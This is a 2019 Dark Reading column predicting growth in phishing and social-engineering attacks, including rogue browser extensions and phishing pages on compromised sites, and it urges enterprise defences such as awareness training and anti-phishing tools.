Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Endpoint Security

1/2/2019
09:15 AM
Atif Mushtaq
Atif Mushtaq
News Analysis-Security Now
50%
50%

Phishing & Social Engineering Attacks Will Rise in 2019

The rise of fileless attack techniques and other developments is making phishing a much more serious problem for enterprise security. As we head into 2019, a new approach is needed.

The cybersecurity field has made great strides in recent years through improvements to email and web security solutions, next-gen antivirus solutions and overall network, operating system and browser hardening.

In turn, threat actors have changed their strategies by adopting hard-to-detect, fileless phishing attacks that exploit the more vulnerable human attack surface. (See New Worm Helps Spread Fileless Version of Bladabindi RAT .)

The threat landscape for 2019 is evolving due to new types of phishing and social engineering attack vectors and methods. These threats are rapidly morphing beyond phishing emails with malicious attachments to penetrate organizations through browser-based attack vectors designed to trick users into divulging sensitive information or install man-in-the-browser snoopware to run stealthily in browser memory.

In short, CSOs and security managers must focus attention on the growing number of threats that leverage malicious sites, regardless of phishing attack vector.

In 2019, cybercriminals will continue to use phishing emails, though the percentage of emails that include malicious attachments will decline as those with malicious links continue to increase. In addition, use of phishing attack vectors beyond email will expand. These vectors include phishing through ads, pop-ups, social media and chat applications. Hackers are also building seemingly legitimate browser extensions that provide useful functionality.

However, these rogue extensions can also act as snoopware to surreptitiously capture credentials that enable additional attacks on the machine or the corporate network.

The battlefield is shifting to compromised websitesWith anti-phishing solutions becoming more adept at spotting newly registered or otherwise suspicious domains, attackers are expanding their use of normally benign but compromised websites to host their malicious phishing pages. This helps them avoid detection and blocking by URL filtration systems and web isolation technologies.

An ecosystem of bad actors is emerging to support this activity. Our threat researchers have noticed a growing number of benign website login credentials for sale on the Dark Web. (See Watch Out: The Dark Web Is Really Watching You.)

Let's be clear -- the concern is not about the browser itself becoming exploited through a software vulnerability.

The most popular browsers are being made more secure all the time. The real issue involves a wider variety of ways that users are tricked into adding malicious browser extensions that can lead to bad outcomes or clicking a link that silently installs snoopware in browser memory.

Most security teams are aware of these new threats, but they are unclear on how to respond. Firewalls are only effective when there is a known malicious URL to block, but the hackers have become skillful at quickly propping up new unidentified web pages, and also using compromised legitimate sites and then shutting phishing pages down again within hours to avoid detection.

By the time they are typically discovered and blocked, the attacks are already done and have moved on. This has given rise to more anti-phishing technologies that can do real-time as well as pre-emptive phishing site detection.

Fresh approaches to thwarting phishingCybercriminals are increasingly turning to social engineering attacks that exploit the human attack surface to evade existing safeguards and gain entry to corporate networks.

These new threats don't directly target the device, the software or the network. The primary target is the employee behind the browser. In other words, the most vulnerable link in the chain is the end user. With more than 4 billion Internet users who own a few connected devices each, and with web usage increasingly common for everyday business tasks, the expansive scope of this problem becomes all too clear.

Security teams will need to deploy new tools and strategies to block phishing threats on the web, before users get duped into doing things that compromise their organizations. On-going phishing awareness training for employees should be a part of any layered security strategy, as should anti-phishing solutions that can detect and help block live web-based phishing threats.

Clearly, this is an on-going game of cat-and-mouse with 2019 promising to bring even more sophisticated phishing attacks to manipulate users. As Google and other browser makers crack down on rogue browser extensions and apps, rogue extension makers will devise new ways to avoid detection. (See Google Chrome 71: Bugs Squashed & New Ways to Block 'Abusive Experiences'.)

With so much sensitive information being passed through the browser via cloud-based apps and cloud storage systems, tricking users and getting man-in-the-browser for snooping is just too tempting a target for cybercriminals.

Related posts:

Atif Mushtaq has spent most of his career on the front lines of the war against cybercrime. Before founding SlashNext, he spent nine years as a senior scientist at FireEye, where he was one of the main architects of FireEye's core malware detection system. Mushtaq has worked with law enforcement and other global agencies to take down some of the world’s biggest malware networks.

Comment  | 
Print  | 
More Insights
Comments
Threaded  |  Newest First  |  Oldest First
COVID-19: Latest Security News & Commentary
Dark Reading Staff 8/3/2020
Pen Testers Who Got Arrested Doing Their Jobs Tell All
Kelly Jackson Higgins, Executive Editor at Dark Reading,  8/5/2020
Browsers to Enforce Shorter Certificate Life Spans: What Businesses Should Know
Kelly Sheridan, Staff Editor, Dark Reading,  7/30/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Current Issue
Special Report: Computing's New Normal, a Dark Reading Perspective
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
The Changing Face of Threat Intelligence
The Changing Face of Threat Intelligence
This special report takes a look at how enterprises are using threat intelligence, as well as emerging best practices for integrating threat intel into security operations and incident response. Download it today!
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-15127
PUBLISHED: 2020-08-05
In Contour ( Ingress controller for Kubernetes) before version 1.7.0, a bad actor can shut down all instances of Envoy, essentially killing the entire ingress data plane. GET requests to /shutdown on port 8090 of the Envoy pod initiate Envoy's shutdown procedure. The shutdown procedure includes flip...
CVE-2020-15132
PUBLISHED: 2020-08-05
In Sulu before versions 1.6.35, 2.0.10, and 2.1.1, when the "Forget password" feature on the login screen is used, Sulu asks the user for a username or email address. If the given string is not found, a response with a `400` error code is returned, along with a error message saying that th...
CVE-2020-7298
PUBLISHED: 2020-08-05
Unexpected behavior violation in McAfee Total Protection (MTP) prior to 16.0.R26 allows local users to turn off real time scanning via a specially crafted object making a specific function call.
CVE-2020-13404
PUBLISHED: 2020-08-05
The ATOS/Sips (aka Atos-Magento) community module 3.0.0 to 3.0.5 for Magento allows command injection.
CVE-2020-15112
PUBLISHED: 2020-08-05
In etcd before versions 3.3.23 and 3.4.10, it is possible to have an entry index greater then the number of entries in the ReadAll method in wal/wal.go. This could cause issues when WAL entries are being read during consensus as an arbitrary etcd consensus participant could go down from a runtime pa...